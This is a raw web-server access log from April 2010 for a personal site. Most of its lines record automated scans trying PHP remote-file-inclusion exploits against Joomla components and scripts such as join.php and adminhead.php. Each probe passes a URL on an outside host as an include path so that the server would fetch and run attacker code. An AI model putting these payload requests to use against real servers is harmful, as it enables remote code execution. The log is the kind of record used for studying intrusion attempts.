87.250.255.243 - - [20/Apr/2010:20:00:50 -0500] "GET /logs/access_log.1173484800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:20:01:17 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:01:17 -0500] "GET /logs/access_log.1268265600/playing.php/common/db.php?commonpath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:01:17 -0500] "GET /playing.php/common/db.php?commonpath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:01:18 -0500] "GET /playing.php/common/db.php?commonpath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:01:18 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:01:18 -0500] "GET /logs/access_log.1268265600/playing.php/common/db.php?commonpath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:01:28 -0500] "GET /logs/access_log.1270684800/playing.php/common/db.php?commonpath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:01:30 -0500] "GET /logs/access_log.1270684800/playing.php/common/db.php?commonpath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:02:04 -0500] "GET /join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:02:04 -0500] "GET /logs/access_log.1252368000/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:02:04 -0500] "GET /logs/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:02:04 -0500] "GET /join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:02:04 -0500] "GET /logs/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:02:04 -0500] "GET /logs/access_log.1252368000/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:20:02:45 -0500] "GET /logs/access_log.1166400000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:20:02:56 -0500] "GET /logs/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:02:56 -0500] "GET /join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:02:56 -0500] "GET /logs/access_log.1252368000/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:02:56 -0500] "GET /logs/access_log.1263427200/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:03:44 -0500] "GET /logs/access_log.1263427200/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:03:44 -0500] "GET /logs/access_log.1252368000/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:03:44 -0500] "GET /logs/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:03:44 -0500] "GET /join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:03:44 -0500] "GET /logs/access_log.1263427200/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
201.38.203.3 - - [20/Apr/2010:20:04:02 -0500] "GET /logs/access_log.1213488000//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
87.250.255.243 - - [20/Apr/2010:20:04:40 -0500] "GET /logs/access_log.1170460800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:20:04:44 -0500] "GET /logs/access_log.1263427200/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
85.25.141.101 - - [20/Apr/2010:20:05:52 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
85.25.141.101 - - [20/Apr/2010:20:05:52 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
85.25.141.101 - - [20/Apr/2010:20:05:52 -0500] "GET /logs/access_log.1220054400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:22 -0500] "GET /join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:22 -0500] "GET /logs/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:22 -0500] "GET /logs/access_log.1224460800%20%20/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:26 -0500] "GET /join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:26 -0500] "GET /logs/access_log.1224460800%20%20/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:26 -0500] "GET /logs/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:31 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:31 -0500] "GET /logs/access_log.1268870400//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:31 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:40 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:40 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:40 -0500] "GET /logs/access_log.1268611200//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:48 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:48 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:06:48 -0500] "GET /logs/access_log.1268611200//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:20:07:13 -0500] "GET /logs/access_log.1253232000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:20:09:08 -0500] "GET /logs/access_log.1239062400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:20:09:45 -0500] "GET /logs/access_log.1268265600%20%20/playing.php/common/db.php?commonpath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:09:56 -0500] "GET /logs/access_log.1268265600%20%20/playing.php/common/db.php?commonpath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:10:06 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:10:16 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:20:11:04 -0500] "GET /logs/access_log.1250208000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:20:11:05 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:11:05 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:11:05 -0500] "GET /logs/access_log.1268611200%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:11:12 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:11:12 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:11:12 -0500] "GET /logs/access_log.1268611200%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:20:12:56 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:20:12:56 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
87.106.132.3 - - [20/Apr/2010:20:12:56 -0500] "GET /logs/access_log.1270684800//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:20:13:38 -0500] "GET /logs/access_log.1269820800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:20:15:14 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:15:14 -0500] "GET /logs/access_log.1219363200//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:15:14 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:15:15 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:15:15 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:15:15 -0500] "GET /logs/access_log.1219363200//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:16:09 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:16:09 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:16:09 -0500] "GET /logs/access_log.1219622400//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:20:16:14 -0500] "GET /logs/access_log.1203465600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
189.78.119.115 - - [20/Apr/2010:20:16:50 -0500] "GET /logs/access_log.1229644800//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
189.78.119.115 - - [20/Apr/2010:20:17:08 -0500] "GET /logs//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
67.222.152.66 - - [20/Apr/2010:20:17:45 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:17:45 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:17:45 -0500] "GET /logs/access_log.1219449600//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:20:19:26 -0500] "GET /logs/access_log.1225670400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:20:19:34 -0500] "GET /logs/access_log.1219363200//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:20:20:43 -0500] "GET /logs/access_log.1204416000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.222.152.66 - - [20/Apr/2010:20:20:52 -0500] "GET /logs/access_log.1219363200%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:20:52 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:20:52 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:20:58 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:20:58 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:20:58 -0500] "GET /logs/access_log.1219363200%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:20:22:38 -0500] "GET /logs/access_log.1221004800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.163.227.186 - - [20/Apr/2010:20:22:54 -0500] "GET /logs//adminhead.php?path[docroot]=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
69.163.227.186 - - [20/Apr/2010:20:22:54 -0500] "GET /logs/access_log.1270598400%20%20//adminhead.php?path[docroot]=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.163.227.186 - - [20/Apr/2010:20:22:54 -0500] "GET //adminhead.php?path[docroot]=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
70.27.2.13 - - [20/Apr/2010:20:23:25 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.27.2.13 - - [20/Apr/2010:20:23:25 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.27.2.13 - - [20/Apr/2010:20:23:30 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.27.2.13 - - [20/Apr/2010:20:23:30 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.27.2.13 - - [20/Apr/2010:20:23:30 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.27.2.13 - - [20/Apr/2010:20:23:30 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.27.2.13 - - [20/Apr/2010:20:23:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.27.2.13 - - [20/Apr/2010:20:23:36 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
70.27.2.13 - - [20/Apr/2010:20:23:39 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; MDDC; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
67.222.152.66 - - [20/Apr/2010:20:23:45 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:23:45 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:23:45 -0500] "GET /logs/access_log.1268265600%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:23:47 -0500] "GET //administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:23:47 -0500] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:20:23:47 -0500] "GET /logs/access_log.1268265600%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
69.163.227.186 - - [20/Apr/2010:20:24:09 -0500] "GET /logs/access_log.1270598400//adminhead.php?path[docroot]=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:20:24:33 -0500] "GET /logs/access_log.1246492800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
69.163.227.186 - - [20/Apr/2010:20:24:42 -0500] "GET /logs/access_log.1265414400//adminhead.php?path[docroot]=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
69.163.227.186 - - [20/Apr/2010:20:24:55 -0500] "GET /logs/access_log.1225238400//adminhead.php?path[docroot]=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:20:26:30 -0500] "GET /logs/access_log.1259625600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
137.101.192.15 - - [20/Apr/2010:20:26:50 -0500] "GET /logs//adminhead.php?path[docroot]=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
137.101.192.15 - - [20/Apr/2010:20:26:50 -0500] "GET //adminhead.php?path[docroot]=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
137.101.192.15 - - [20/Apr/2010:20:26:50 -0500] "GET /logs/access_log.1270598400//adminhead.php?path[docroot]=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
189.78.119.115 - - [20/Apr/2010:20:27:40 -0500] "GET /logs/access_log.1229731200//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
87.250.255.243 - - [20/Apr/2010:20:27:47 -0500] "GET /logs/access_log.1221782400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
137.101.192.15 - - [20/Apr/2010:20:28:36 -0500] "GET /logs/access_log.1270598400%20%20//adminhead.php?path[docroot]=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
217.168.155.50 - - [20/Apr/2010:20:29:56 -0500] "GET /logs/access_log.1219708800/?path%5Bdocroot%5D=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.46.199.185 - - [20/Apr/2010:20:30:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:20:30:20 -0500] "GET /logs/access_log.1173225600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.168.155.50 - - [20/Apr/2010:20:30:42 -0500] "GET /logs/access_log.1219708800/?path%5Bdocroot%5D=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
137.101.192.15 - - [20/Apr/2010:20:31:26 -0500] "GET /logs/access_log.1265414400//adminhead.php?path[docroot]=http://sogra.ru/idxx.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
